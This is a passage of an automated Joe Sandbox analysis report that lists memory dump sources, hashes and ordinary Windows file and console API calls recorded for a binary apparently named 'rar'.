                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ConsoleFileHandleModeType
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4141822043-0
                                                                                                                                                                                                                                                                    • Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                                                                    • Instruction ID: b8b64a5189ae05811ea352a695c51526024873c740c55d143597996a625faa58
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3E08C20E0460282EA688B21A86E13906E1DF49F80F4021B8D80FCF391EE2C9C8D8300
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CharEnvironmentExpandStrings
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4052775200-0
                                                                                                                                                                                                                                                                    • Opcode ID: d3cf55b71ff3c281346cb4b18b9965101663fbf2bf251821757e6ab4d6f75e53
                                                                                                                                                                                                                                                                    • Instruction ID: f365b585bc1288b6b75694deadb3a396d9af2923731a589fe4df6920938463ca
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3cf55b71ff3c281346cb4b18b9965101663fbf2bf251821757e6ab4d6f75e53
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90E1CE23A18682D1EB308B26D4801BE66F0FB91B90F44517ADF9D87AD9DF7CE885D700
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF695CE7EBE,00000000,00000000,00000000,00000000,00000007,00007FF695CE7C48), ref: 00007FF695CF1B8D
                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF695CE7EBE,00000000,00000000,00000000,00000000,00000007,00007FF695CE7C48), ref: 00007FF695CF1BD7
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                                                                    • Instruction ID: 3a271922e63127f3f6356d5cd38a8a97e9c0e4aadede955f3b3fc2861efd2210
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F831F4A3A1868586F7709F20D4053B926E0EB81F79F105378DE6C866C5EFBCC9898744
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 932687459-0
                                                                                                                                                                                                                                                                    • Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                                                                    • Instruction ID: bffd69ab892f2eb10208106d79b13b72da81544c82ec777872fc0ef6a5b58e75
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88213753918F8582DB11CF29D5511B863B0FB58F88B14A365DF9D83656EF38E5E5C300
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 41790b01cb1f7c00ec1593391ec280087b552f2c22c642c21a2f5fc04b89232f
                                                                                                                                                                                                                                                                    • Instruction ID: b4eb3fe79af71eaafce42adcad3921504b04a5c528a7fafddf10452c0a7e4364
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41790b01cb1f7c00ec1593391ec280087b552f2c22c642c21a2f5fc04b89232f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3911B932509B8182EA20DB64B5003A972E4EF84F90F240779EA9D477E6DE7CD856C308
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                                                                    • Instruction ID: d5d29169f9b4963f1e8a491d806dab2065e971a9c88f1428c058d4c6687f63dc
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC01C222A19691C2EA748B26A90013D62F1EF54FA0F649374DE2DC3BD4CE2CEC41E704
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • setbuf.LIBCMT ref: 00007FF695CE7A7B
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695D32AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF695D37EF3
                                                                                                                                                                                                                                                                    • setbuf.LIBCMT ref: 00007FF695CE7A8F
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CE7B44: GetStdHandle.KERNEL32(?,?,?,00007FF695CE7A9E), ref: 00007FF695CE7B4A
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CE7B44: GetFileType.KERNELBASE(?,?,?,00007FF695CE7A9E), ref: 00007FF695CE7B56
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CE7B44: GetConsoleMode.KERNEL32(?,?,?,00007FF695CE7A9E), ref: 00007FF695CE7B69
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695D32ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF695D32AD0
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695D32B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF695D32C1C
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4044681568-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
                                                                                                                                                                                                                                                                    • Instruction ID: 41ed9f8de5a77ea8bad87b8419ce4efacdfedc809d8b72e85b1906203625c26a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E010201E0918286FA38B37518A63B914C2CF82F94F1463F8E15DCA3E7DD6C2C0A831A
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                                                                    • Instruction ID: 124b52bb1a694d3fa6ed5f56f0de2af29a9835a16b3263e6495eb78ae7dac3c9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9301AD22A08642C2EB749F29E84527827B1EB44F78F545375EA3D8A1E5CF7CDD8AC700
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000800,00007FF695CF305D,?,?,?,?,?,?,?,?,00007FF695D04126,?,?,?,?,00000800), ref: 00007FF695CF30F0
                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF695D04126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF695CF3119
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                                                                    • Instruction ID: 4ccdf195d48160dfd9f8814ac12b6aca266ccaec030ad9185efbd1aa1646f3ef
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ECF08121B1868142FA709B24E4542B962E0EB4CB94F401675ED9CC7799CF6CD9494A04
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1175261203-0
                                                                                                                                                                                                                                                                    • Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                                                                    • Instruction ID: e13fde1a30ed35e0c6247ff81642847571415aba84a42e53ace9abcf3104a84a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6F09621B1858146F6709B20E8153F663E4FF8CB84F805271E9CDC6699DF2CDA4D8B44
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1231390398-0
                                                                                                                                                                                                                                                                    • Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
